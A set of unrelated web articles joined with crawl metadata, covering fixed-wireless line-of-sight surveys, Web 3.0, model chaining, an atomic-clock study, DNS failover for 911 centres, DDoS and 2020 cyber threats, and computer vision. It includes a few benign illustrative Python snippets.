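print("%.1f km" % max_link_km(30, 30))  # about 45 km, or roughly 28 miles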
How Does MHO Handle LOS Considerations?
MHO engineers employ satellite imagery when determining the layout for potential clients and a fixed wireless Internet network. Through this accurate and up-to-date imaging, engineers can verify that MHO's infrastructure is within a direct line of sight with a client’s building. This also allows for the consideration of tall trees, hills, buildings, and bridges that could present a problem in the proposed radio pathway.
Other items that may be overlooked by some companies can include existing equipment on the client’s roof (HVAC units), roof parapets, and the best placement on the roof for MHO’s fixed wireless equipment. A building’s elevation is also a key feature that contributes to line of sight and system positioning.
When your company seeks to work with MHO on a fixed wireless Internet network, the results from our LOS survey will fall into three basic categories:
- Yes - We have clear visibility from our tower site and should be able to provide service to the client.
- Probable - We might have LOS, but will need to perform a survey at the client’s site. Computer software isn’t always 100% accurate, so if the path shows any possible obstruction, then a site survey is required to be certain.
- Not at this time - LOS is blocked to all towers that belong to MHO within the area at this time. However, clients are always encouraged to reach out again at a later date, as MHO's network is constantly growing and adding more tower locations.
In some circumstances where line of sight cannot be directly obtained, MHO may be able to erect a relay. If the client requires fixed wireless service and requests it, MHO can implement this technology to connect the client’s building to the nearest tower. Sometimes this relay can be positioned on another existing building in the area that has a clear line of sight to both MHO's tower and the client's location. Note that this service requires additional cost and a longer installation timeframe.
Web 2.0 vs. Web 3.0: Differences Defined
With the web in a constant state of flux, it’s important to differentiate between Web 2.0 and Web 3.0 and prepare for the next iteration of the web.
What is a Web 3.0 website? Web 3.0 is powered by artificial intelligence and uses blockchain technology to create a more secure, private, and decentralized web experience.
What Was Web 1.0?
The first and earliest stage of internet development is colloquially known as Web 1.0, although (obviously) it wasn’t referred to as such until the rapid and ubiquitous deployment of Web 2.0 technology.
Web 1.0 covers the early days of dial-up connections, AOL, and the internet as a new and emerging technology.
Primary Web 1.0 technologies include the following:
HyperText Markup Language
HTML is the descriptive foundation of content as it is presented on the internet. “Markup” languages, in this context, are a form of metadata that defines how a web browser should display content.
Using the concept of nesting tags and document structure to standardize the presentation of content online, HTML allows web developers to format text, include different forms of media (video, images, or audio), and embed hyperlinks directly into text.
Hyperlinks are, in some respects, the backbone of content in the Web 1.0 paradigm. Links connect pages such that a reader can navigate through pages quickly and logically. Without links, web content would end up siloed on different servers, requiring users to know the direct URL address of that content to access it.
Subsequently, the use of links drove the rise of web portals and, eventually, search engines, through which users could easily navigate the rapidly growing body of content available on the web.
HyperText Transfer Protocol
To facilitate the transfer of HTML documents from servers to users’ desktops, developers like Tim Berners-Lee began building a protocol to quickly and reliably exchange information like HTML.
Before the advent of HTTP, it was still common for computers to exchange information via file-sharing protocols like FTP. However, this approach wasn’t especially intuitive, nor did it integrate seamlessly with the purpose of HTML – namely, to download and display content.
HTTP provided a way for servers to receive data requests from users that would navigate to that content via a Uniform Resource Locator (URL), a string of characters specifying the domain location and directory of a document. Over time, evolutions of the HTTP protocol would introduce faster data transfer speeds, persistent connections and additional security through the HyperText Transfer Protocol Secure (HTTPS) extension.
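The request-response cycle HTTP introduced is easy to demonstrate in a few lines of Python using only the standard library; the example fetches a page from example.com, a domain reserved for documentation.

from urllib.request import urlopen

# The URL names the protocol, the server, and the resource being requested.
with urlopen("https://example.com/") as response:
    html = response.read().decode("utf-8")
    print(response.status, len(html))  # e.g. 200 and the document size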
Web 1.0 is characterized by static, persistent web pages, typically relying more on text than on graphics to convey their message. Some preliminary efforts toward eCommerce arose during this time as well.
What Is Web 2.0?
In the early 2000s, web developers began to look at the existing paradigm of web development as a limitation, rather than an expansion, of interactivity with and between users. While Web 1.0 utterly transformed communication for enterprises and users throughout the 1990s, specialists and engineers began to look into ways to replace bland web pages.
Some of the technologies that emerged over the early 2000s and for the next 15-20 years include the following:
Databases and PHP
Databases weren’t new at the time—in fact, databases had been around, in one way or another, for decades. However, there was never an easy way to utilize database information to serve user requests as they were made.
A major step towards developing such capabilities was the integration of the PHP: Hypertext Preprocessor scripting language. And yes, you read that correctly—the name is a recursive acronym that refers to itself.
PHP is a server-side language that bridged the gap between client-side web presentation (HTML) and server databases. Programmers could develop systems that take user input from HTML forms, process it as a formal request to a database through SQL, and return the results as a new web page formatted HTML.
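The flow this paragraph describes, form input to SQL query to HTML output, can be sketched in a few lines. PHP was the historical workhorse, but the example below uses Python and its built-in sqlite3 module; the database file and table schema are invented for illustration.

import sqlite3

def handle_search(form_input):
    """Take user input from a form, query the database, and return HTML."""
    conn = sqlite3.connect("blog.db")  # hypothetical database file
    # A parameterized query: the driver escapes the user's input safely.
    rows = conn.execute(
        "SELECT title FROM posts WHERE title LIKE ?", ("%" + form_input + "%",)
    ).fetchall()
    conn.close()
    items = "".join("<li>%s</li>" % title for (title,) in rows)
    return "<ul>%s</ul>" % items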
The development of PHP and database integration allowed for the development of more dynamic websites like blogs, the popularity of which signaled the start of Web 2.0.
Rich Media
The move from static web pages led to the integration and foregrounding of rich media. Web 1.0 content would often include images, audio, and in some cases, embedded video. Limitations in hardware and Internet infrastructure made moving large data files around harder, limiting how media could be used.
In Web 2.0, visual media is just as important, if not more so, than text. Large, high-resolution images are much more common, and video is as prevalent as static images. More importantly, streaming video – video played instantly from a central server rather than requiring a complete download – has changed how we consume media.
Blogging and Social Media
Early blogging relied on databases and PHP, but blogging from home became much more accessible once users had more interactive authoring tools – most users don’t have the technical skills to write text and store it in a database, after all.
Perhaps the most impactful development during this time, and of Web 2.0 broadly, was that of social media. Real-time updates, interactive media, and short, bite-sized pieces of content streamlined publishing and sharing. They ushered in the rise of media platforms like WordPress, Facebook, Twitter, Amazon, and Google.
Platforms and major eCommerce sources often rely on large, centralized infrastructure to serve high bandwidth and provide high availability. However, many users have begun to raise concerns about this kind of centralization, including issues around censorship, privacy, and the commercial use of personal information.
In some areas, decentralized infrastructure developments have become a major topic of interest. Technologies like BitTorrent have provided the initial stirrings of a decentralized network, even if it is a bit limited as a file-sharing tool. BitTorrent uses P2P transactions, where users share information directly without needing a centralized server.
What Is Web 3.0?
Moving to Web 3.0 is predicated on decentralizing the web, making the web more intelligent, more ubiquitous, and more device-agnostic.
Some of the major innovations in Web 3.0 include the following:
Blockchain
Decentralization is a major part of the Web 3.0 approach, and nothing is pushing that concept further than the blockchain. Originally invented as the ledger for the Bitcoin network, blockchains are decentralized forms of record-keeping that rely on cryptography and various verification methods to ensure the ledger’s integrity.
While the broad, public chains of cryptocurrency aren’t quite ready for enterprise use, tailored, private chains are finding a home in enterprise data storage and record-keeping, particularly where security and immutability are required.
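The core integrity idea, each block committing to the previous one through a cryptographic hash, fits in a short Python sketch; real blockchains add consensus, signatures, and networking on top of this.

import hashlib
import json

def block_hash(block):
    # Hashing includes the previous block's hash, so altering any block
    # invalidates every block that comes after it.
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

chain = [{"index": 0, "data": "genesis", "prev": "0" * 64}]
for i, record in enumerate(["record A", "record B"], start=1):
    chain.append({"index": i, "data": record, "prev": block_hash(chain[-1])})

# Verify the ledger by recomputing every link.
intact = all(chain[i]["prev"] == block_hash(chain[i - 1]) for i in range(1, len(chain)))
print("chain intact:", intact)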
Artificial Intelligence
With the advent of massively scalable cloud computing platforms and specialized artificial intelligence applications, modern web enterprises have turned online cloud platforms into intelligent systems that can perform advanced predictive analytics and drive autonomous machines.
While AI has a wide range of applications, it’s especially influential in online data-driven apps for human users and machine agents across different systems. These kinds of user-machine and machine-machine interactions are radically changing how we interact with common forms of digital media like social media, online games, and other SaaS apps.
Metadata
Tim Berners-Lee hypothesized that Web 3.0 would be dominated by metadata – data about data that allows for richer machine reading and interpretation. And in many cases, we see this emerging as the driving engine of the new paradigm.
It’s critical to understand that things like AI and powerful computing platforms rely on robust metadata – to the extent that metadata becomes just as important as, if not more important than, the data itself. Accordingly, evolving standards in metadata, like XML, JSON, and other schemas, are driving data categorization.
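A small example makes the point concrete: the JSON record below is hypothetical metadata about an article, structured so that a machine can read a description of the content without parsing the content itself. The field names are illustrative, not a formal schema such as Dublin Core or schema.org.

import json

record = {
    "title": "Web 2.0 vs. Web 3.0",  # data about the document, not the document
    "type": "article",
    "language": "en",
    "keywords": ["web3", "blockchain", "metadata"],
    "published": "2022-01-01",       # illustrative date
}
print(json.dumps(record, indent=2))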
Authentication and Identity in Web 3.0 with 1Kosmos
One of the most important parts of Web 3.0 is security. Information must be secure with millions of users (and all their data) plugged into public and enterprise systems. Web 3.0 technology like the blockchain and AI can power more robust identity management platforms and advanced biometrics.
With 1Kosmos BlockID, you get an authentication and identity solution built for the future of Web 3.0. This kind of future-looking technology comes with the implementation of specific features like the following:
- SIM Binding: The BlockID application uses SMS verification, identity proofing, and SIM card authentication to create solid, robust, and secure device authentication from any employee’s phone.
- Identity-Based Authentication: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through credential triangulation and identity verification.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API and SDK.
- Identity Proofing: BlockID verifies identity anywhere, anytime, and on any device with over 99% accuracy.
- Privacy by Design: Embedding privacy into the design of our ecosystem is a core principle of 1Kosmos. We protect personally identifiable information in a distributed identity architecture and the encrypted data is only accessible by the user.
- Private and Permissioned Blockchain: 1Kosmos protects personally identifiable information in a private and permissioned blockchain and encrypts digital identities so that they are accessible only by the user. The distributed architecture ensures there are no databases to breach or honeypots for hackers to target.
- Interoperability: BlockID can readily integrate with existing infrastructure through its 50+ out-of-the-box integrations or via API/SDK.
Sign up for the 1Kosmos newsletter, and read more about Why a Secure Web 3.0 Starts with Decentralized Identity and Passwordless Access. | <urn:uuid:bf5ecc8a-4a01-4d00-b78a-6cdb2ad74821> | CC-MAIN-2024-38 | https://www.1kosmos.com/blockchain/web2-web3/ | 2024-09-17T08:03:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00356.warc.gz | en | 0.914063 | 2,068 | 3.25 | 3 |
In the realm of data science, model chaining works by assigning the output of one model as the input of the next one in the sequence. This technique comes in handy when dealing with complex problems that can't be adequately addressed with a single model. For example, in a multi-step forecasting scenario, the predictions made by the first model may serve as the input data for the next model to predict a subsequent time period. Similarly, in a multi-tier classification problem, the primary model may be used to classify the input into broad categories, and then subsequent, more specialized models could further categorize the data within these broad classes.
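A minimal sketch of the multi-step forecasting case makes the mechanics concrete. It uses scikit-learn and a toy linear series, so the models and data are purely illustrative: the first model's prediction becomes the second model's input.

import numpy as np
from sklearn.linear_model import LinearRegression

# Toy series: the value at time t is 2t + 1.
t = np.arange(20, dtype=float).reshape(-1, 1)
series = 2.0 * t.ravel() + 1.0

# Model 1 learns to predict the value one step ahead from the current time.
model_1 = LinearRegression().fit(t[:-2], series[1:-1])
# Model 2 takes model 1's output and predicts the step after that.
model_2 = LinearRegression().fit(series[1:-1].reshape(-1, 1), series[2:])

step_1 = model_1.predict([[20.0]])               # forecast one step ahead
step_2 = model_2.predict(step_1.reshape(-1, 1))  # chained two-step forecast
print(step_1, step_2)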
Model chaining also allows for diverse and sophisticated blends of simple and complex machine learning algorithms, tapping into the strengths of each to achieve superior results. Importantly, while this technique permits greater flexibility and computational efficiency, it requires careful planning and understanding to implement effectively as mistakes early can exponentially impact the final output.
Model chaining allows data scientists to break down complex problems into manageable chunks, evaluate them individually using different models, and then link these solutions together to form a more accurate and comprehensive solution.
Model chaining is invaluable to data science as it expands the capabilities and applications of machine learning algorithms. By breaking down complex problems into simpler sub-problems and asserting a sequence of models to tackle each part, more accurate predictions and richer insights can be derived from the data. Additionally, model chaining allows for the use of different types of models that are best suited for specific sub-tasks within the broader problem. This method also improves the interpretability of machine learning, as each model in the sequence can be evaluated and understood individually, providing clarity to the decision-making process.
In the sphere of large language models, model chaining takes on a unique significance. Large language models are complex, and their raw outputs can be too broad to directly produce specific, useful insights. Model chaining helps break these analyses down into comprehensible segments handled by subsequent models. This sequence of models, each tackling a simpler sub-task, enables a better and more nuanced understanding of language by combining context, semantics, and syntax across multiple models. This ultimately leads to more accurate, structured, and insightful responses, improving both the quality and utility of the large language model's output.
For companies leveraging large language models, model chaining can greatly enhance the value they extract from these models. By applying different models to various layers of the language data, they can pull out specific insights with higher accuracy. A sequential use of models gives companies the ability to convert the complexity of human language into analyzable data and valuable input for decision making.
With model chaining, businesses can customize how information gleaned from large language models is processed and interpreted. This customized analysis can support everything from customer sentiment analysis and personalized marketing to sophisticated product recommendations and customer response prediction. Hence, the understanding and application of model chaining can be a critical factor for companies in maximizing the benefits they derive from large language models. | <urn:uuid:b0bb298f-8ffb-4509-87f5-c75764877ab6> | CC-MAIN-2024-38 | https://www.moveworks.com/us/en/resources/ai-terms-glossary/model-chaining | 2024-09-19T21:57:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00156.warc.gz | en | 0.920499 | 606 | 3.171875 | 3 |
JILA researchers used a three-dimensional strontium lattice clock to control several arrays of atoms, then applied a new imaging technique to measure the particles' subsequent quantum states, NIST said Wednesday.
The research team created arrays made up of as few as one atom, or as many as five atoms per lattice cell within the atomic clock. The team then triggered the particle interactions using a laser.
Jun Ye, a JILA Fellow, said that the resulting observations could yield knowledge that would make it possible to improve atomic clocks.
Information from the study could also help advance quantum information processing and enhance various kinds of sensors, according to NIST.
NIST sponsored the research effort with NASA, the Defense Advanced Research Projects Agency, the Army Research Office, the Air Force Office of Scientific Research, and the National Science Foundation.
In our digitally driven world, public safety hinges on the rapid, reliable transmission of critical information to the right responders at the right time. Yet, the Internet, which plays a pivotal role in this exchange, is not immune to disruptions. In this new era of emergency services, Public Safety Answering Points (PSAPs) must remain vigilant in the face of Internet downtime, as even brief outages can have life-altering consequences. Fortunately, a lifeline exists in the form of Domain Name System (DNS) rerouting, an innovative technology that can help PSAPs overcome the unique challenges posed by Internet disruptions. In this article, we’ll explore what DNS rerouting entails and how it can be an essential asset to PSAPs during critical moments when the Internet goes down.
What is DNS Rerouting?
The Domain Name System (DNS) is the fundamental architecture underpinning the Internet, translating human-readable domain names into IP addresses. DNS rerouting is the practice of redirecting network traffic to an alternative IP address when the primary server becomes unreachable. This redirection can be enacted manually or automatically, depending on the situation.
The Challenges of Internet Downtime for PSAPs
Before we delve into the utility of DNS rerouting for PSAPs, it’s important to appreciate the unique challenges these organizations face during Internet outages:
Emergency Response Delays: Internet downtime can lead to delayed emergency responses, making it imperative for PSAPs to have a backup plan in place.
Loss of Communication Channels: Disruptions in Internet connectivity can lead to a loss of critical communication channels, making it difficult for first responders to coordinate and share vital information.
Data Retrieval Issues: In emergency situations, immediate access to critical databases and information is paramount. Internet outages can result in an inability to retrieve crucial data.
How DNS Rerouting Can Aid PSAPs
DNS rerouting offers a robust solution to these challenges by enabling PSAPs to redirect traffic to backup servers or resources when their primary servers are rendered unreachable. Here’s how it operates:
DNS Records Configuration: PSAPs configure their DNS records to include failover options. These records guide incoming requests to secondary or backup servers that can be relied upon when the primary server becomes inaccessible.
Continuous Monitoring: DNS rerouting services vigilantly monitor the availability of the primary server. Upon detecting a failure, they swiftly update DNS records to reroute traffic to the designated backup server.
Seamless Traffic Diversion: Incoming requests are seamlessly directed to the backup server, ensuring that PSAPs continue to operate effectively, even during Internet downtime.
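A toy version of the monitoring step looks like the Python sketch below. The hostnames are placeholders, and a production failover service would update the DNS record itself rather than just choosing a target locally.

import socket

PRIMARY = ("primary.psap.example", 443)  # placeholder endpoints
BACKUP = ("backup.psap.example", 443)

def reachable(host, port, timeout=2.0):
    """Basic TCP health check of the kind a DNS failover service performs."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# On primary failure, the DNS record would be updated so that new lookups
# resolve to the backup server instead.
target = PRIMARY if reachable(*PRIMARY) else BACKUP
print("route traffic to:", target)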
Benefits of DNS Rerouting for PSAPs During Internet Downtime
Uninterrupted Emergency Response: DNS rerouting helps PSAPs maintain their accessibility, offering uninterrupted service during Internet outages to swiftly respond to emergencies.
Enhanced Data Redundancy: Configuring DNS to point to backup servers allows PSAPs to maintain data redundancy, reducing the risk of losing critical information during Internet disruptions.
Heightened Resilience: DNS rerouting bolsters the overall resilience of PSAPs. It is a proactive strategy for addressing outages and minimizing service interruptions during crucial moments.
Superior Disaster Recovery: DNS rerouting is an integral component of a comprehensive disaster recovery plan for PSAPs, ensuring that they remain operational when unforeseen circumstances affect Internet connectivity.
By implementing an advanced DNS management system, PSAPs can reroute calls in potentially under a minute during network emergencies. This prevents service interruptions and provides citizens with confidence that 911 will remain available. As NG911 usage expands, proactive resilience measures like DNS rerouting will become essential to ensuring the highest levels of emergency response reliability. Public safety organizations that leverage this capability will be better prepared to maintain 24/7 operability – even when faced with internet instability. | <urn:uuid:ce441726-589b-4eea-afd1-772a28411653> | CC-MAIN-2024-38 | https://carbyne.com/blogs/safeguarding-public-safety-dns-rerouting-as-a-resilience-tool-for-psaps-during-internet-downtime/ | 2024-09-07T18:24:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00356.warc.gz | en | 0.908825 | 810 | 2.640625 | 3 |
What Is DDoS Attack?
A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming it with a flood of internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked resources such as IoT devices. By sending multiple requests—from different sources—at the same time, the attacker is able to flood the target with more traffic than it can handle, resulting in a denial of service for legitimate users.
Usage and Examples
DDoS attacks are commonly used by malicious actors to target websites, online services, and networks. For example, a DDoS attack could be used to take down a website by flooding it with requests from multiple sources, making it impossible for the website to respond to legitimate requests. DDoS attacks can also be used to target online services, such as gaming servers, or networks, such as a company's internal network. | <urn:uuid:1f3bbe00-558f-43b0-bc26-8a3be8c3f256> | CC-MAIN-2024-38 | https://www.evolvesecurity.com/glossary/ddos-attack | 2024-09-07T17:48:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00356.warc.gz | en | 0.941453 | 242 | 3.3125 | 3 |
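One simplified way to see the "more traffic than it can handle" idea is a per-source rate check like the Python sketch below. Note that a true DDoS spreads requests across many sources precisely to evade this kind of single-source limit, so real defenses aggregate traffic upstream; the window and threshold here are illustrative.

import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10
MAX_REQUESTS = 100  # illustrative threshold

recent = defaultdict(deque)

def is_flooding(source_ip, now=None):
    """Record one request and report whether the source exceeds the window limit."""
    now = time.time() if now is None else now
    window = recent[source_ip]
    window.append(now)
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    return len(window) > MAX_REQUESTS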
It would be impossible to discuss the top cyberthreats of 2021 without mentioning the COVID-19 pandemic. Apart from the obvious dangers to human health and the economic impact, the pandemic fundamentally altered the digital world this year, including how we work and how we spend our free time online.
As travel ceased, most businesses and services had to switch to primarily online operations. Those who were already online had to expand, introducing entirely new processes into their workflows. This rapid shift opened organizations up to cyber threats on a larger scale than ever before.
In 2020, a staggering 31% of global companies were attacked by cyber criminals at least once per day. Over 1,000 had sensitive data stolen and publicly leaked by ransomware gangs. And even when a return to office life is possible, it seems clear that digital operations will remain far more prevalent than in previous years. Understanding the cyber threat landscape is key to staying safe online.
What is a cyber threat?
A cyber threat is a malicious act — or just the possibility of one — that seeks to damage or steal data, or to otherwise disrupt computer networks and systems. Common cyber threats include computer viruses, software vulnerabilities, distributed denial of service attacks (DDoS), and social engineering techniques, such as phishing. Even “offline” events like natural disasters can be considered a cyber threat, as they put systems and data at risk.
Cyber threats may come from a variety of sources, including:
- Criminal gangs
- Corporate spies
- Disgruntled insiders
- Individual hackers
No matter the source, cyber threats are a massive hazard. They threaten not only business health and operations, but even our daily life in this increasingly-digital world. And with AI and automation making cyberattacks easier to carry out, effective cyber protection is critical.
What were the most malicious cyber threats of 2020?
Ransomware
Malicious applications that encrypt – and often steal – sensitive data continued to be a top cybersecurity threat in 2020. According to a report from cyberinsurance provider Coalition, ransomware was responsible for 41% of all cyberinsurance claims this year.
Data is increasingly at the forefront of business operations and decision-making, no matter the industry. Its loss, even temporarily, can have massive financial and reputational damage. Cybercriminals are well aware of this, and their continued strikes and massive ransom demands are indicative of the fact that data recovery is, indeed, worth millions of dollars to many organizations.
COVID-19 scams and other cyber threats
Massive news events lead to a surge in people searching for information online, and the COVID-19 pandemic has been no exception. Those seeking answers — What’s the latest news? How can I stay safe? How do I get financial aid? — had to contend with a huge number of scams and other exploits.
Cybercriminals have taken tried-and-true cyber threats, such as phishing campaigns and malicious email attachments, and themed them after the pandemic. By exploiting anxieties and a general sense of urgency, such attacks often succeed in getting victims looking for answers and assistance to put their better judgment aside.
Attacks on remote work tools
The COVID-19 pandemic has significantly changed the cyber threat landscape. Work-from-anywhere has become the new normal, and 92% of global organizations adopted new technologies this year to facilitate the switch to remote operations. While this has created plenty of new opportunities for vendors, it also highlights the numerous security and privacy risks associated with remote work.
Tools that enable collaboration and remote access to internal company servers are ripe attack targets for cybercriminals, and the rush to adopt new technologies — as well as budgetary and IT staff limitations — has resulted in many organizations pressing forward without properly vetting and configuring their new solutions. As a result, cyberattacks on these targets are frequently successful.
Supply chain attacks
With data at the core of every business — and remote access and collaboration tools increasingly necessary — it’s clear that IT services are no longer optional. Many organizations, especially small and medium businesses, rely on managed service providers (MSPs) for these needs.
It’s no wonder, then, that cybercriminals increasingly see MSPs as a ripe attack target. By compromising a service provider, criminals gain access to potentially hundreds of their customers downstream – far more efficiently than going after SMBs one by one. Poorly configured remote access software is one of the most exploited attack vectors, though attackers also take advantage of software vulnerabilities and social engineering techniques to gain access to these providers – and ultimately, their clients.
High-profile ransomware attacks
On July 18, Telecom Argentina — the country’s largest telecommunications provider — was hit by a ransomware attack that encrypted over 18,000 systems, including terminals with highly-sensitive data. The infamous Sodinokibi group demanded an initial ransom of $7.5 million, set to double if not paid within 48 hours.
Only a week later, Garmin — one of the world’s largest wearable device companies — began experiencing a major outage of services and production. Garmin later confirmed this was the result of a WastedLocker ransomware attack. The cybercriminals are believed to have demanded a $10 million ransom, which Garmin reportedly paid — although the company has not publicly verified this.
Canon, the multinational firm specializing in optical and imaging products, fell victim to the Maze ransomware in August. Many of the company’s internal systems were impacted, as was their U.S. website. The Maze operators appear to have stolen over 10 TB of data, including the Social Security numbers and financial account details of thousands of current and former Canon employees.
Rampant pandemic-themed exploitation
In April, the German state of North Rhine-Westphalia (NRW) fell victim to a phishing campaign targeting COVID-19 relief funds. Cybercriminals created a fake version of the NRW’s aid request website, and sent out emails directing Germans to the phony site. When victims filled out the “application,” the attackers captured this personal data and used it to submit their own aid requests through the real website. NRW officials reported that up to 4,000 falsified requests were ultimately granted by the government, resulting in as much as $109 million being sent to the scammers.
The latest version of the notorious TrickBot malware was distributed in a phishing campaign, in which victims received emails that claimed to contain information about free COVID-19 testing. These messages directed users to fill out the attached “form,” which actually contained a malicious script that downloaded the payload after a delay (in order to better avoid detection by anti-malware solutions).
Collaboration tools under siege
As videoconferencing solutions saw explosive user growth this year, they also attracted a lot of unwanted attention from cybercriminals, many of whom immediately began analyzing these applications for exploitable weaknesses.
By mid-April, multiple zero-day vulnerabilities in the Zoom virtual conferencing platform had been identified, and were listed in dark web markets — one exploit being sold for $500,000. Zoom was also the target of a large-scale phishing campaign in which cybercriminals sent out fake password-stealing meeting invitations, taking advantage of user dependency on (and unfamiliarity with) the service.
Similar services were targeted as well. Users of both Microsoft Teams and Cisco Webex had to contend with phishing emails with “notifications” that pointed users towards fake, credential-lifting login pages. In one week, as many as 50,000 Microsoft 365 users were attacked in this manner.
Cybercriminals focus on MSPs
In June, the Canada-based Pivot Technology Solutions was impacted by a partially-successful ransomware strike. Though the attack didn’t manage to encrypt any systems, some personal data — including addresses, Social Insurance Numbers, and payroll information — regarding employees and consultants was exfiltrated.
Global IT services and solutions provider DXC Technology announced in early July a ransomware attack against its Xchanging subsidiary, whose customers include companies in the insurance, financial services, healthcare, defense, and aerospace industries.
Returning cyber threats in 2021
With the pandemic still underway and driving business operational decisions, expect more of these same cyber threats in 2021. Work-from-anywhere is here to stay, and it’s unclear whether we’ll ever make a full return to traditional office setups.
With regard to ransomware, data exfiltration is poised to become bigger than encryption, as cybercriminals strive to maximize success rates and monetize every attack. Strikes against cloud services will only grow alongside the services’ own popularity, taking advantage of improper configurations and weaknesses in the supply chain.
It’s also likely that we’ll continue to see huge increases in the volume and variety of more traditional cyber threats. Advances in automation and data mining allow cybercriminals to rapidly create and iterate on new malware variants, using data from corporate websites and social media profiles to personalize each attack. Increased adoption of the Internet of Things (IoT) is expanding the attack surface dramatically, with smart devices and appliances often poorly protected.
Staying safe in the “next normal”
With these challenges ahead, it’s important for businesses to invest in solutions that can meet the top cyber threats head-on and provide comprehensive cyber protection.
Anti-malware agents may stop a cyber threat in progress, but they can’t restore compromised data. Backup agents won’t automatically know about a cyber threat, and data will be recovered slowly – assuming it hasn’t been compromised. Security patches that fix vulnerabilities in popular software are released frequently, but they’re inconsequential if not applied across your workloads in a timely manner.
To address these issues, we recommend tools like Acronis Cyber Protect — an integrated solution that combines data backup, anti-malware, RMM, vulnerability assessment, and patch management capabilities into a single agent. This level of integration enables optimal performance, eliminates compatibility issues, and ensures rapid automated recovery in the event of a breach.
A Swiss company founded in Singapore in 2003, Acronis has 15 offices worldwide and employees in 50+ countries. Acronis Cyber Protect Cloud is available in 26 languages in 150 countries and is used by over 20,000 service providers to protect over 750,000 businesses. | <urn:uuid:f525be8f-9dde-4ed1-9a86-d888d36a2b62> | CC-MAIN-2024-38 | https://www.acronis.com/en-eu/blog/posts/malicious-cyber-threats-2020/ | 2024-09-08T21:45:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00256.warc.gz | en | 0.953364 | 2,164 | 3.078125 | 3 |
The Quantum and Classical-Quantum Computers in Our Future
(WallStreetJournal) The venerable Wall Street Journal predicts that, while the exact nature and scope of quantum computing’s promise is only vaguely defined today, future quantum computers will come in a variety of sizes and shapes, suited to different purposes. Meanwhile, IBM, Google, and Microsoft are big players, as are several university-based research groups and national laboratories around the world.
Quantum computers store information on quantum bits, called qubits, which are more intricate than bits and can store information more densely. While qubits are powerful, they’re also delicate and hard to work with.
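The density claim can be made concrete with a few lines of Python: describing the state of n qubits takes 2 to the power n complex amplitudes, a number that outgrows classical bit counts very quickly.

import numpy as np

# An n-qubit register is described by 2**n complex amplitudes.
for n in (1, 10, 30):
    print("%2d qubits -> %s amplitudes" % (n, format(2 ** n, ",")))

# A concrete 2-qubit state: an equal superposition of 00, 01, 10, and 11.
state = np.full(4, 0.5, dtype=complex)
print("normalized:", np.isclose(np.vdot(state, state).real, 1.0))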
A promising development is the classical-quantum hybrid, in which a classical computer calls on a relatively small quantum “coprocessor” to do critical calculations within its own programs. The coprocessor strategy follows the spirit of graphics processing units (GPUs) – superfast chips that perform certain specialized operations extremely efficiently. GPUs were originally developed for use in computer games, where they make it possible to update fast-paced displays. But ingenious researchers have exploited them in many other ways.
The hybrid strategy could start to deliver on the promise of quantum computation for chemistry and materials science long before large, general-purpose quantum computers are available—if they ever are. Bring on the QPUs! | <urn:uuid:fb885615-0761-4659-9e0f-4acfdc043164> | CC-MAIN-2024-38 | https://www.insidequantumtechnology.com/news-archive/quantum-classical-quantum-computers-future/ | 2024-09-10T04:56:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00156.warc.gz | en | 0.924799 | 281 | 3.0625 | 3 |
Sanjay Pichaiah, Co-Founder & Vice President, Products & GTM, at Akridata, recently appeared as a guest on DataCamp’s webinar on the power of AI-powered Computer Vision tools in Business. This blog is a recap and introduction to Computer Vision and how it could help your business grow in 2024.
Until very recently, performing data science with image and video data was an incredibly difficult task. But now, advancements in AI-powered tools have allowed more organizations to extract value from visual data, an increasingly important need for businesses. That said, there are still many challenges and subtleties when it comes to working with visual data.
Who uses computer vision?
Computer vision is a form of AI that enables computers to capture, interpret, analyze, predict, and make decisions based on visual (photo and video) data. Computer vision is used across a wide range of fields including in facial recognition software, medical imaging and disease diagnosis, for self-driving vehicles, in security and surveillance, for manufacturing and quality control, retail, and even for agriculture and crop maintenance.
Computer vision is most frequently used for visual inspection, monitoring, and the creation of pictorial or video content that represents data interpretation. Computer vision is increasingly being used by organizations, and with the advancement of new tools, has been more available than ever before.
Getting Started with Computer Vision: Image Classification
One of the most common ways Computer Vision is used, and one of the best ways to get started with Computer Vision, is image classification. Image classification assigns a label or category to an input image, based on the visual content. Think: the videos from a traffic camera that are sorted and labeled by an automated AI tool trained to recognize the differences between cars, trucks, bikes, and pedestrians.
Image classification can be broken down into three simple steps: data collection and preparation, selecting model architecture (i.e. using an off-the-shelf model or building a custom model), and training the model with training datasets.
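The three steps can be walked through end to end on a tiny dataset. The scikit-learn sketch below uses the bundled 8x8 digit images and a linear classifier as a stand-in for the deep networks used in production pipelines.

from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Step 1: data collection and preparation.
digits = load_digits()
X_train, X_test, y_train, y_test = train_test_split(
    digits.data, digits.target, test_size=0.2, random_state=0
)

# Step 2: model selection (an off-the-shelf linear model stands in here).
model = LogisticRegression(max_iter=2000)

# Step 3: training, followed by a quick evaluation.
model.fit(X_train, y_train)
print("test accuracy:", model.score(X_test, y_test))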
While image classification is one of the most ubiquitous tasks used by organizations, the task becomes more difficult if the data used for training is biased or messy.
The Common Challenges of Working with Visual Data and Computer Vision
